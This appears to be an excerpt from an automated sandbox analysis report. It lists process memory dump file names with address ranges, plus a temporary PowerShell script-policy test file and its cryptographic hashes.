memory/6388-1267-0x00007FF840430000-0x00007FF840EF1000-memory.dmp

memory/3420-1299-0x0000000003240000-0x0000000003276000-memory.dmp

memory/3420-1303-0x0000000074AB0000-0x0000000075260000-memory.dmp

memory/3420-1305-0x0000000002E90000-0x0000000002EA0000-memory.dmp

memory/3420-1307-0x0000000002E90000-0x0000000002EA0000-memory.dmp

memory/3420-1309-0x00000000059C0000-0x0000000005FE8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ef2ugyto.hnf.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3420-1326-0x0000000005950000-0x0000000005972000-memory.dmp

memory/3420-1337-0x0000000006260000-0x00000000062C6000-memory.dmp

memory/3420-1343-0x00000000063B0000-0x0000000006704000-memory.dmp

memory/3420-1381-0x0000000006840000-0x000000000685E000-memory.dmp

memory/3420-1431-0x0000000006DA0000-0x0000000006DE4000-memory.dmp

memory/4376-1448-0x00007FF840430000-0x00007FF840EF1000-memory.dmp

memory/4376-1450-0x000001E70FDB0000-0x000001E70FDC0000-memory.dmp

memory/7732-1454-0x00007FF840430000-0x00007FF840EF1000-memory.dmp

memory/7732-1456-0x0000021CAD9F0000-0x0000021CADA00000-memory.dmp

memory/3420-1459-0x0000000002E90000-0x0000000002EA0000-memory.dmp

memory/2728-1457-0x0000000000C10000-0x0000000000C11000-memory.dmp

memory/7732-1463-0x0000021CAD910000-0x0000021CAD932000-memory.dmp